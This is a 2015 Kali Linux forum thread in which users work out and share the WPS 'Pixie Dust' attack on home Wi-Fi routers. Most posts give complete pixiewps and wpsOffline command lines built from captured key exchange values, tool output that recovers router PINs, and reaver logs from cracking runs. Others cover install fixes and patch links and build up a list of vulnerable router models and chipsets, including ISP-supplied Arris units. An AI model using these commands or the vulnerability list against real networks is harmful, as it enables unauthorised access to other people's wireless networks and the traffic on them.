PKE: d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5 :75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8 f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2: c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c :b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:3 5:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72: c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5 :26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:f a:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09: 23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d :79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d 9:f8:68:80:11:55:d7:44:6a
PKR: bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1 :d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:3 6:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7: 79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0 :c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:9 3:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b: 33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36 :24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:c a:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48: c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4 :a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:0 1:a4:29:77:a9:d4:81:d4:0e
E-Hash1: 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba :ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38
E-Hash2:b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43 :cb:c5:6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:e c

PIN Found- 04847533

mmusket33
2015-03-31, 02:47
To Soxrox2212

We see your written reaver program provides the Enrollee nonce

The problem we are having is with the -pke and -pkr keys. When we capture the M1 and M2 message with wireshark the message is too long. Note in the working example published in these threads the length of the -pke string was 384. Our captures are twice that long.

The string length of the -ak -hash1 and -hash2 is 64

A breakdown of M1 and M2 can be found at:

https://briolidz.wordpress.com/2012/01/10/wi-fi-protected-setup-wps/

Enrollee -> Registrar: M1 = Version || N1 || Description || PKE
Enrollee <- Registrar: M2 = Version || N1 || N2 || Description || PKR [ || ConfigData ] || HMAC_AuthKey(M1 || M2*)

• || this symbol means concatenation of parameters to form a message.
• Mn* is message Mn excluding the HMAC-SHA-256 value.
• Version identifies the type of Registration Protocol message.
• N1 is a 128-bit random number (nonce) specified by the Enrollee.
• N2 is a 128-bit random number (nonce) specified by the Registrar.
• Description contains a human-readable description of the sending device (UUID, manufacturer, model number, MAC address, etc.) and device capabilities such as supported algorithms, I/O channels, Registration Protocol role, etc. Description data is also included in 802.11 probe request and probe response messages

Our understanding is we must strip off parts of the M1 and M2 message is this correct?

soxrok2212
2015-03-31, 02:58
Havent had a chance to test the PIN, but here is what I got.


Arris - DG1670AB2

PIN Found- 04847533

This is what I got:

root@Kali:~# pixiewps -a 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa :d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c -e d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5 :75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8 f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2: c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c :b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:3 5:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72: c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5 :26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:f a:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09: 23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d :79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d 9:f8:68:80:11:55:d7:44:6a -r bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1 :d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:3 6:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7: 79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0 :c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:9 3:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b: 33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36 :24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:c a:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48: c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4 :a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:0 1:a4:29:77:a9:d4:81:d4:0e -s 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba :ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38 -z b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5 :6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec

[%] Progress: 0% 100%
Time taken: 0 s

ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00

ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00

PSK1: d4:eb:0c:2a:38:15:e1:a0:3d:70:db:74:31:eb:53:a3

PSK2: d3:b7:e6:23:f3:1d:22:0a:23:ea:07:bb:7f:76:65:8b

[+] WPS pin: 04840753

soxrok2212
2015-03-31, 03:03
To Soxrox2212

Our understanding is we must strip off parts of the M1 and M2 message is this correct?

All you should have to do is open wireshark, navigate to the M1 and M2 messages, then scroll to the public keys and copy the values for those keys... I'd upload a screenshot but the formatting requirements to upload are whack...

mmusket33
2015-03-31, 10:24
MTeams are stumbling thru this attack testing on three(3) different computers.

Here is an administrative problem to watch out for.

1. When running the new reaver program provided by soxrox2212 you should see additional text data.

Such as:

Starting Cracking Session....

> N1 Enrollee Nounce: ....

>Auth Key....

If you just see normal reaver output stop reaver and make sure the Network-Manager Icon has both

Enable Networking
Enable Wireless

checked. If that does not work restart the computer.

Some laptops will not provide this output unless these two(2) items are functioning.

dudux
2015-03-31, 11:21
Same here ;) Finishing Broadcom PRNG as well

Maybe it is not worth it to implement in several threads, you can bruteforce PSK2 at the same time than PSK1. But being time zero ....
With Broadcom, since we got N1 and the entropy is reduced to 32-7=25 bits. It is still constant time even without threads.


$ time python wpsOffline.py -ak 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa :d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c -pke d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5 :75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8 f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2: c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c :b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:3 5:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72: c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5 :26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:f a:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09: 23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d :79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d 9:f8:68:80:11:55:d7:44:6a -pkr bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1 :d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:3 6:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7: 79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0 :c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:9 3:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b: 33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36 :24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:c a:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48: c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4 :a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:0 1:a4:29:77:a9:d4:81:d4:0e -ehash1 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba :ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38 -ehash2 b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5 :6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec
PIN FOUND! 04847533

real 0m0.488s
user 0m0.473s
sys 0m0.012s

wn722
2015-03-31, 15:32
hey, I'm testing it with TP-Link device on WN722N usb dongle (Atheros)

Atheros Communications, Inc. AR9271 802.11n

and nothing comes up with wpsOffline script.
can anyone ping me pixiewps.c version?
link on dropbox is dead

p.s.
on some routers PKE comes up as

00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02

cheers.

my data is

> AuthKey: 89:90:f7:93:61:95:eb:3b:36:5e:6e:31:b9:e6:cc:76:e4 :20:8b:b9:a6:65:00:de:0a:d4:2e:06:70:64:5c:46
[+] Sending M2 message
> E-Hash1: 9b:21:69:1d:bd:94:16:b5:b6:53:74:76:48:88:69:ed:e4 :ae:30:95:82:22:4f:fa:a5:3c:56:19:45:f5:3e:ac
> E-Hash2: 22:ac:97:70:3d:c0:e6:2d:28:d4:9e:61:f7:92:d2:8b:c8 :59:6b:8d:14:c9:cb:15:93:76:b7:4b:19:b2:a3:95

M1 PKE - 82:ea:40:37:43:42:0b:a5:56:8e:48:50:c3:d7:ce:8b:9d :79:c8:0e:c8:01:a7:e0:45:e9:53:35:2b:e1:f9:76:e0:b d:bf:4d:9a:32:be:84:86:88:03:ca:55:61:ef:e9:af:a9: f7:99:b2:98:40:a9:cc:37:15:be:79:19:57:69:02:ac:4b :7c:11:ba:e5:3f:b6:e9:89:e9:c0:6d:0e:ac:50:d1:04:d 7:f4:35:04:ec:3c:7d:0d:16:e7:c7:1b:e8:0f:37:90:7b: 91:f8:3a:64:22:af:4c:9e:3c:ff:68:7c:c1:b1:b1:00:0c :ba:83:5d:18:28:b5:7b:ca:86:00:97:ff:1f:00:6e:0c:e b:6f:c2:62:85:b5:4a:19:28:b3:67:81:4b:bb:22:74:d0: ac:5e:0a:d1:91:66:cd:1b:28:76:8e:57:a1:16:af:2d:a9 :ad:a1:f1:d0:fa:c6:91:5d:be:c0:d3:fb:73:d1:9a:37:4 7:23:64:fc:88:aa:08:01:c9
M2 PKR - 38:e3:db:ae:9c:ce:35:98:7c:f3:c8:61:ab:4d:8d:08:ef :ba:73:73:a3:bf:18:b8:e4:1b:13:62:6e:e9:9a:d8:d6:7 b:fc:d0:ed:7b:55:19:2e:ff:43:e1:3b:9e:1e:bd:c8:60: 29:6a:03:a1:c9:cf:47:18:0c:d6:f7:3c:32:86:27:a4:1d :77:d7:0d:0d:48:02:1e:15:81:de:0a:2c:71:3f:fa:d1:d a:eb:5e:95:e4:3d:b6:a6:39:d5:ab:f8:d3:8d:d5:91:fa: b0:ac:07:51:67:2b:56:f2:39:2f:12:00:f2:42:21:8a:5f :60:1a:98:e4:f7:42:7c:b4:1c:6d:0a:1f:b3:9c:66:bf:8 d:8b:27:57:04:f9:e5:c1:b9:38:4f:f6:6d:65:ec:45:dd: 23:b7:72:09:91:38:f9:48:59:6e:0c:8c:df:57:10:0a:18 :8b:39:d7:bb:bf:19:22:c5:98:cd:a3:28:62:c8:4f:d2:f a:8d:9f:0a:db:57:bb:26:a5

wn722
2015-03-31, 15:33
big ups soxrox and musket for explanations.

dudux
2015-03-31, 17:52
big ups soxrox and musket for explanations.

If wpsOffline does not print anything that means PIN NOT FOUND! The router is not taking ES1=ES2 as zero.

the C code I hosted right here: https://bitbucket.org/dudux/wpsoffline/src/c1217beada95bc090cb57a042daca956a9ae4433/C_code/?at=master
But it will give you the same result. Basically the attack is pretty much the same

soxrok2212
2015-03-31, 18:50
That version of pixiewps is depreciated. A new version should be released soon by the author wiire.

wn722
2015-03-31, 19:25
ok,
is it AP chipset specific? or firmware?

soxrok2212
2015-03-31, 19:42
ok,
is it AP chipset specific? or firmware?

Both. If the vendor didn't change the WPS implementation then it is chipset specific, but the AP manufacturer may have changed that. Usually they don't however.

psicomantis
2015-04-01, 02:56
I havent been able to test the PIN of my initial capture, but tested thie one today and worked perfectly.


TG1672G32

N1 Enrollee Nonce: dd:0a:25:21:2c:55:e8:6b:39:67:cf:2f:6d:0b:d9:6e
AuthKey: 54:19:47:34:ef:1a:79:5f:9a:29:2a:c2:fc:17:4a:74:78 :bf:47:71:87:1e:30:27:67:3b:ef:32:58:b7:2b:4c
PKE: 7f:43:2b:4d:4b:ab:2e:63:60:a5:10:20:75:da:c8:b9:8b :1e:4c:ff:c3:c3:29:3a:4f:4e:16:53:dc:76:df:de:d8:6 c:4e:35:28:82:c0:5c:f8:79:85:51:3c:a1:06:3c:a3:6a: 84:b8:43:e1:28:29:9a:0e:98:38:d2:18:0c:e4:69:ff:d4 :1e:c7:a2:8e:82:1a:84:16:e7:d4:a1:c2:f6:2d:9d:5d:3 d:bf:82:73:be:26:74:14:69:82:f7:d5:ee:aa:32:77:ba: 79:b0:55:88:fa:9a:61:f4:f7:5e:4f:d7:da:76:da:60:b4 :cd:93:e0:53:dd:62:09:33:c3:56:48:3f:22:68:b2:46:1 2:a2:ea:a2:75:e2:be:57:9f:86:fb:5b:bf:03:f7:2d:37: d2:10:c8:26:8d:d2:d5:b1:4a:f6:2f:66:bd:25:2d:1f:ae :90:e2:b9:ee:78:da:5b:86:59:bb:57:67:a1:63:5e:c0:6 6:a3:5c:82:96:62:f7:7b:ed
PKR: 0c:6d:d1:29:13:e7:b6:4c:ef:56:6e:19:4f:4d:e0:b6:5e :0f:8d:08:4d:32:af:bd:7c:75:ae:5b:15:a6:53:d7:4a:2 7:53:44:54:8f:18:5a:56:67:ff:a5:27:a1:a4:95:31:b5: 57:af:d2:53:e2:8d:c4:b5:c2:eb:0f:b7:0c:43:82:10:aa :2f:b4:42:e5:b1:ed:a7:a1:f0:d0:50:1a:e4:69:ca:f7:a 9:da:b9:ff:86:6f:68:59:61:e1:37:19:de:50:51:bd:dd: 60:ef:85:a8:e2:90:64:03:24:a6:c2:9d:e4:6d:09:92:11 :52:30:4c:9e:b4:2e:a8:fe:be:f8:88:7c:f4:ae:eb:57:4 0:b7:8f:8b:5d:f7:62:5a:bf:80:21:46:e9:83:28:95:f1: 58:d9:26:f5:c6:2a:bf:83:ab:a5:eb:ac:ee:e0:96:5e:06 :9f:0e:ca:06:32:2a:72:57:95:b6:dd:67:d4:f7:56:98:9 b:fa:ba:51:88:e8:a7:08:34
E-Hash1: 36:7c:e3:7e:cc:75:74:f6:88:1a:6b:7d:06:15:ef:d8:2c :eb:d9:d6:07:b8:2d:68:4b:ec:25:8f:3e:14:15:07
E-Hash2: 55:c7:18:2b:c6:ed:87:de:95:d2:98:19:2e:69:f9:0e:65 :a9:d0:02:5e:ed:9c:24:d4:ce:2a:63:14:61:46:56

[+] Pin cracked in 15 seconds
[+] WPS PIN: '31335492'

wn722
2015-04-01, 13:53
i see.
one more quetion - these keys (ak, PKE,PKR, Ehash1/2) do they need to be part of same conversation?
OR any key is good?

soxrok2212
2015-04-01, 14:09
They have to be from the same session. Aka pin 77755533's data will differ from 98949682. The data is not interchangable.

wn722
2015-04-01, 14:19
edited **************8

soxrok2212
2015-04-01, 15:41
Well you can compare the enrollee nonce that reaver prints with the enrollee nonce in wireshark... then you can assume the rest of the data is matching and you are looking at the right session. Don't compare PKE or PKR values as some APs reuse DH Keys!

wn722
2015-04-01, 15:54
nah, i was just being thick - all it takes is to run reaver with one pin attempt.
I'm assuming you get all the data from one try though

soxrok2212
2015-04-01, 18:00
Yes you are correct

wn722
2015-04-02, 00:55
anyone tried TP-Link devices?
I got some 740,841 and it's zip.

soxrok2212
2015-04-02, 01:48
There have been a few vulnerable ones. Are you saying you have a zip file that you want tested?

mmusket33
2015-04-02, 02:39
More reaver/bully reinstall problems with pixiedust mod

Musket Team labs did a fresh HD install of kali-linux then apt-get upgrade/apt-get install then loaded the pixie dust moded bully and reaver. First note our comments in threads above for reaver install concerning libpcap-dev and libsqlite3-dev.

In addition:

When reinstalling reaver with the pixie-dust mode you may find in wireshark that the M2 public key is always ......000000002 for ALL targets.

You will also find that when reinstalling bully that you get an openssl error message and a failed reinstall.


To correct this get an internet connection then:

apt-get install libssl-dev


Run wireshark and reaver and the public key for M2 will be seen.

Install bully and the install process proceeds with no errors.

Musket Teams Labs

wn722
2015-04-02, 04:06
There have been a few vulnerable ones. Are you saying you have a zip file that you want tested?
no i meant i'm getting nothing when running it against the script.
I didn't see any tp-link in the list of supported devices.
c

wiire
2015-04-02, 09:55
When reinstalling reaver with the pixie-dust mode you may find in wireshark that the M2 public key is always ......000000002 for ALL targets.

You get PKR: 00:00 [...] 00:02 when using '-S' ('--dh-small') option.

@wn722
The very first AP I tested was a TP-LINK (see my first 2 posts). But I haven't written down the model.

mmusket33
2015-04-02, 12:06
To Wire - Yes we ran a test and you are correct. This then leads to to the obvious question.

1. Will a pixie dust attack work with DH small data?

2. If it does then we can just run a DH small attack. This would mean that the pkr variable would always be constant.


MTeams

wn722
2015-04-02, 12:15
@wiire
hm, can you look it up?
also did you use wpsOffline or pixiewps script?

wn722
2015-04-02, 12:17
1. Will a pixie dust attack work with DH small data?

2. If it does then we can just run a DH small attack. This would mean that the pkr variable would always be constant.


I was getting 00:00:xx:02 PK every now and then running with bare reaver. with -N -L -S option it was fixed.

soxrok2212
2015-04-02, 12:21
I will try to see if small DH Keys work later today. I don't expect it to however, but it is certain worth a try.

wiire
2015-04-02, 13:40
I will try to see if small DH Keys work later today. I don't expect it to however, but it is certain worth a try.
Of course it works.

I added the -S option to pixiewps so we don't need to print PKR on screen or get it on Wireshark.

@wn722
I only use my program, pixiewps.

wn722
2015-04-02, 13:48
@wn722
I only use my program, pixiewps.
can you share a link?
cheers.

soxrok2212
2015-04-02, 13:51
can you share a link?
cheers.

It will be out along with a video demo sometime this week.

wiire
2015-04-03, 10:44
Pixiewps is out! :)

Link to the pixiewps thread (https://forums.kali.org/showthread.php?25018-Pixiewps-wps-pixie-dust-attack-tool).

FurqanHanif
2015-04-03, 11:38
Modified Reaver Not Showing Publick Key (pke).. :confused:


Trying pin 00005678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
> N1 Enrollee Nonce: f8:49:5a:df:00:b7:0b:9b:6c:cc:64:2d:11:c8:89:52
[+] Received M1 message
> AuthKey: ce:cc:a5:98:fb:a8:5c:c7:7b:5f:1a:a2:be:ca:1b:b5:40 :27:72:a3:3e:d7:4b:db:dd:78:bf:3c:02:bc:51:aa
[+] Sending M2 message
> E-Hash1: 75:26:1a:d3:bd:73:ed:8e:3e:15:3b:aa:33:b0:dd:92:03 :0b:93:7e:93:cb:c0:ec:34:64:9b:06:ea:61:71:8b
> E-Hash2: 01:d6:8f:f1:9d:3d:da:52:3c:45:42:2f:5f:55:f2:3a:0c :00:3f:f2:ae:bf:9c:7b:12:6e:ee:56:89:2c:52:d3
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 2
[+] Pin count advanced: 2. Max pin attempts: 11000
[+] Trying pin 01235678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
> N1 Enrollee Nonce: 27:2b:38:0d:fc:3a:17:06:d4:7d:d3:09:4d:86:87:95
[+] Received M1 message
> AuthKey: 51:29:84:ca:f5:96:d2:b8:f3:90:9f:81:1f:3e:48:57:2e :5c:b1:81:13:83:84:66:86:82:d3:5b:1b:9b:75:ab
[+] Sending M2 message
> E-Hash1: 87:0f:45:30:2f:61:61:53:88:cb:b6:23:e9:ea:d5:22:9a :c4:c3:62:ff:2a:02:b7:99:a1:9d:99:d9:45:f7:82
> E-Hash2: f9:51:2a:a4:3f:79:e7:67:28:f7:37:f4:31:a7:17:ca:75 :e8:b8:3b:31:25:4a:13:60:c5:82:f5:ef:a7:cc:8f
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 3

wn722
2015-04-03, 12:57
cool.
does it matter if you use dec format or just plain string?

af:75:f6:2c:eb:08:c3:f9:71:72:22:92:04:6f:cd:0c
vs
af75f62ceb08c3f971722292046fcd0c

soxrok2212
2015-04-03, 13:00
I'm pretty sure both work.

wn722
2015-04-03, 13:12
If anyone has luck on devices can you post your HW info?
didn't work for
TP link 841N v8 - AR9341
TP link 841N v9 - QCA9533-AL3A
TP link 720N v1 - AR9331

wn722
2015-04-03, 13:20
hey any way to get the AK from wireshark only?

soxrok2212
2015-04-03, 13:29
Those are all Atheros :) not supported that's why it didn't work

zimmaro
2015-04-03, 15:17
many ,many thanks for this thread && hard work && scripts guys!!!!! (soxrok2212,wiire,kcdtv,rep.....thanks-so-much.)
really appreciate!!!!
one-test...seem correct
http://www.imagestime.com/show.php/1019753_pixie.PNG.html

wiire
2015-04-03, 15:24
many ,many thanks for this thread && hard work && scripts guys!!!!! (soxrok2212,wiire,kcdtv,rep.....thanks-so-much.)
really appreciate!!!!
one-test...seem correct
http://www.imagestime.com/show.php/1019753_pixie.PNG.html
You could've just converted the last 6 bytes of the MAC to decimal to get the PIN. But whatever...

10/10 for the drawing! ;)

@wn722
No.

wn722
2015-04-03, 20:13
Those are all Atheros :) not supported that's why it didn't work
that's a bummer...

Quest
2015-04-04, 22:58
Many thanks soxrok2212 and all who participated! Epic thread :cool:

soxrok2212
2015-04-04, 23:07
Many thanks soxrok2212 and all who participated! Epic thread :cool:

Don't forget Wiire... the actual creator of the tool!

psicomantis
2015-04-07, 17:25
Quick question. Would it matter if I always use the enrollee nonce? or should I only use it in certain cases?

soxrok2212
2015-04-07, 18:11
Nah it shouldn't matter... Just be sure to always use it when you attack broadcom.

aanarchyy
2015-04-07, 18:16
[P] WPS Manufacturer: ENCORE Technologies, Inc.
[P] WPS Model Number: ENHWI-3GN3
Ralink chipset: RT3050

Confirmed Vulnerable.

https://wikidevi.com/wiki/Encore_ENHWI-3GN3

psicomantis
2015-04-07, 18:31
Thanks soxrok2212.

soxrok2212
2015-04-07, 18:43
[P] WPS Manufacturer: ENCORE Technologies, Inc.
[P] WPS Model Number: ENHWI-3GN3
Ralink chipset: RT3050

Confirmed Vulnerable.

https://wikidevi.com/wiki/Encore_ENHWI-3GN3

Thanks... added to the list!

nuroo
2015-04-07, 21:04
Add to the database as attack successful.
Arris models:
TG1672
DG1670

Used in Time Warner foot print. Model not listed on wikidevi. chipset not listed in chip uid database.
I would guess ralink chipset.
Reaver mod list wps manufacturer - "Celeno Communication, Inc.", model - "CL1800".

soxrok2212
2015-04-07, 21:37
Are you using pixiewps? Because if you use that and it says E-S1 and E-S2 = 00000000, then its Ralink. Otherwise is Broadcom.

nuroo
2015-04-07, 21:57
yes pixiewps. ralink
E-S1 and E-S2 = 00000000, shown

soxrok2212
2015-04-07, 22:02
Sweet thanks! I'll add them to the database

aanarchyy
2015-04-08, 04:47
TG862G seems to be a bit of a hit-or-miss, this one did not accept the "secret" pin, but was still vulnerable.


[P] E-Nonce: b1:55:f2:0b:09:dd:44:63:8b:f2:e1:94:d8:90:5e:e0
[P] PKE: bd:98:1b:00:24:0a:08:96:85:92:9c:5b:21:e8:bf:7e:2e :f3:0f:6c:ea:c1:4d:85:ba:af:58:7e:63:c4:f0:92:ef:8 a:90:f4:d4:5a:b0:59:33:18:ae:ac:31:9e:a0:ed:b8:16: fe:bd:9c:b6:e1:aa:0e:5a:72:c8:9d:31:89:0b:ed:1f:45 :e5:34:8c:ea:74:d5:35:f4:4a:13:1d:92:81:fd:e9:4d:4 2:88:4b:ea:ed:ef:ff:16:aa:c0:4f:3b:8f:fe:bc:f5:e7: ec:96:7e:c7:06:4b:5a:3b:20:0a:7b:72:14:4b:75:b1:25 :2e:b9:a7:41:e9:4c:67:87:07:2b:a4:7a:c6:02:c2:91:9 a:60:10:d8:5e:ca:fb:87:26:b2:3f:ca:3e:94:16:3c:7c: d6:60:e1:54:11:78:78:d6:f6:95:01:10:a8:ed:11:bf:12 :52:85:cc:02:77:32:2a:d3:2d:63:e3:bd:23:a1:dc:27:9 8:55:4c:c5:5a:ae:d4:8b:48
[P] WPS Manufacturer: ARRIS
[P] WPS Model Number: RT2860
[+] Received M1 message
[P] AuthKey: d5:c6:8d:34:3b:bf:9f:33:24:15:c4:3a:39:f7:84:73:b8 :f1:1e:ea:02:fc:b2:1e:6f:65:fe:56:ac:df:8a:9d
[+] Sending M2 message
[P] E-Hash1: 74:d7:4f:96:17:d9:77:0e:2d:7e:d7:3b:67:a6:e1:0a:cb :ab:eb:f9:23:bd:69:a6:59:f2:ff:1d:27:c8:fc:8b
[P] E-Hash2: f1:2e:03:65:55:9f:9c:21:73:e5:a7:4b:0a:27:ca:fe:46 :d1:49:8c:c8:9b:9d:f1:17:70:61:b7:c3:8b:3d:34
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 11 seconds
[+] WPS PIN: '56276053'
[+] WPA PSK: 'PASSWORD_HERE'
[+] AP SSID: 'HOME-XXXX'
[+] Nothing done, nothing to save.


I've still yet to come across one that accepted both pins.
EDIT: Noticed this one had a different chipset than the others I've seen, maybe the "secret" pin is more revision or chipset specific?
Wish i could change my nick to what it was when i was a dev on the (now very defunct) knoppix-std team...

g0tmi1k
2015-04-08, 15:02
If you want to manually patch reaver yourself:

Reaver v1.4 (Official release) #r119 ~ 2013-10-20
Homepage: https://code.google.com/p/reaver-wps/
Patch: http://pastebin.com/raw.php?i=mkeKYppU

Reaver v1.5 (Community fork) #8 - 2014-01-04
Homepage: https://code.google.com/p/reaver-wps-fork/
Patch: http://pastebin.com/raw.php?i=gQFcBbtW

wiire
2015-04-08, 17:06
If you want to manually patch reaver yourself:

Reaver v1.4 (Official release) #r119 ~ 2013-10-20
Homepage: https://code.google.com/p/reaver-wps/
Patch: http://pastebin.com/raw.php?i=mkeKYppU

Reaver v1.5 (Community fork) #8 - 2014-01-04
Homepage: https://code.google.com/p/reaver-wps-fork/
Patch: http://pastebin.com/raw.php?i=gQFcBbtW

Thank you.

I think in the near future I might modify the program so that it won't depend on a modded version of Reaver but just on the standard one. :)

g0tmi1k
2015-04-08, 17:19
For what its worth, both pixiewps and the patched version of reaver have made it into the Kali repos:

PixieWPS (New): https://bugs.kali.org/view.php?id=2203
Reaver (Patched): https://bugs.kali.org/view.php?id=2210

Calamita
2015-04-08, 18:04
soxrok2212, I tried messaging you on the Google Drive sheet but it looked as though you couldn't respond... :)

Another one to add to the list as vulnerable:-

Zyxel P-2812HNU - Wikidevi here (https://wikidevi.com/wiki/ZyXEL_P-2812HNU-F3)



[P] WPS Manufacturer: ZyXEL Technology, Corp.
[P] WPS Model Number: V3.11(TUJ.3)
[+] Received M1 message
[P] AuthKey: 85:5f:fc:cb:b8:...
[+] Sending M2 message
[P] E-Hash1: 66:29:ae:09:ab:...
[P] E-Hash2: 81:a4:d5:58:f3:...
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3 seconds
